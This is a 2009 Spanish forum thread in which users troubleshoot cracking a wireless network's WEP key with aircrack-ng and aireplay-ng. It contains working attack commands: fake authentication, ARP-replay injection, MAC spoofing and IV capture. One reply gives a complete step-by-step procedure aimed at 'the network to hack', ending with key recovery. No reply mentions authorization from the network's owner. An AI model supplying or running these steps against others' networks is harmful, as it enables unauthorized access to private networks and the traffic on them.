La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)

Iniciado por Casidiablo, 16 Enero 2009, 15:29 PM

0 Miembros y 1 Visitante están viendo este tema.

Carloswaldo


Casidiablo

¿Y no es eso lo que estoy tratando de hacer? O sea, la opción -1 del comando aireplay-ng...

heaviloto

hola, perdon me e colado, es que con eso de A1 y A3 me lio un poco, xd xd xd xd, queria decir esto exactamente,

- aireplay-ng   -3  -b  (bssid  del AP)  -h   (bessid del  que este conectado)   wlan0 

prueba a poner eso despues de intentar asociarte

un saludo
larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)

Casidiablo

Muestra esto, y solo esto:

Read 83454 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...

Van aumentando el número de paquetes pero no los ARP ni ACK...

Casidiablo

Si hago todo usando la MAC del AP, me sale esto:

aireplay-ng -3 -b 00:1C:10:08:39:15 -h 00:1C:10:08:39:15 wlan0
15:47:10  Waiting for beacon frame (BSSID: 00:1C:10:08:39:15) on channel 6
Saving ARP requests in replay_arp-0116-154710.cap
You should also start airodump-ng to capture replies.
Read 18688 packets (got 0 ARP requests and 6 ACKs), sent 0 packets...(0 pps)


Bueno, siempre y cuando en otra consola tenga corriendo el ataque 1... cada vez que en el fake auth aparece esto: Sending Authentication Request (Open System) [ACK], el número de ACKs crece en el ataque 3 (tiene sentido). Pero aún así, no he podido hacer nada.

Muchas gracias por su ayuda.

heaviloto

hola, te suben los datas en el airodump?, si es asi, un poco de paciencia, no siempre es a la preimera, y segun el estado de animo del router, xd xd xd xd xd

un saludo
larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)

fuenteRea

bajale la rate a la tarjeta ifconfig rate 1M, si tienes un portatil prueba a cambiarte de sitio o apaga y enciende el router porque algunas veces son muy cabezones estos router, un saludo!!
PD: haz el ataque1 de esta manera--> aircrack-ng -1 30 -a BSSID -e ESSID -h BSSID wlan0
Una rosa es una rosa...

Spanslus9mm

Buenas, te voy a decir como lo veo yo:

- No se seguro si lo estas haciendo, pero es importante cambiarte la MAC de tu tarjeta (pero no a la del AP) y usar esa misma MAC falseada en la opción -h.

-Con el 0 le estas diciendo que se intente reautentificar continuamente. Dependiendo del modelo de router esto no puede ser adecuado, prueba otros valores como 30 o 20 (se reautentifica cada 30 o 20 segundos)

-Bajar el rate a 1M como dice thedoctor77
iwconfig wlan0 rate 1M

-Puedes probar a añadir la opción -o 1 (Envía solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs)

-Y para terminar hay algunos routers preparados para no responder a este ataque, si pruebas todo lo que te han sugerido y no logras nada quizá no lo puedas hacer.

Saludos ;)

Una muy breve historia de todo:
El hidrógeno es un gas ligero e inodoro que, con el tiempo suficiente se convierte en gente

Lapiz_tola

hola yo tengo el programa backtrack 3y mi tarjeta de red es atheros y tengo los pasos a seguir de ese programa y si funciona perfectamente es pero que te sirva de algo PARA CAMBIAR A MODO MONITOR
primera terminal
modprobe -r ath_pci

modprobe ath_pci autocreate=monitor

iwconfig (ath1 es mi trjeta de red) mode monitor

airodump-ng (ath1 es mi tarjeta de red)

iwconfig (ath1 es mi tarjeta de red) rate 1M channel (el de la red a hackear)

ifconfig (ath1 es mi tarjeta de red) hw ether 00:11:22:33:44:55

airodump-ng --ivs --bssid (mac-de la que vas a hackear ) -w (cualquier nombre del archivo) -c (canal de la red) (ath1 es mi tarjeta de red)

segunda terminal


aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


tercera terminal

aireplay-ng -3 -b (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


para sair de las terminales es ctrl:c
para recuperar la clave en la primera terminal le pones

aircrack-ng (nombre del archivo)-01.ivs
los datos que vienen entre parentesis son los que tienes que cambiar ya cambiados no le pongas los( ) espero y te sirva saludos

fuenteRea

Lapiz_tola que dices?, ese no es el problema, leete bien el hilo y no varies el problema, un saludo!!
Una rosa es una rosa...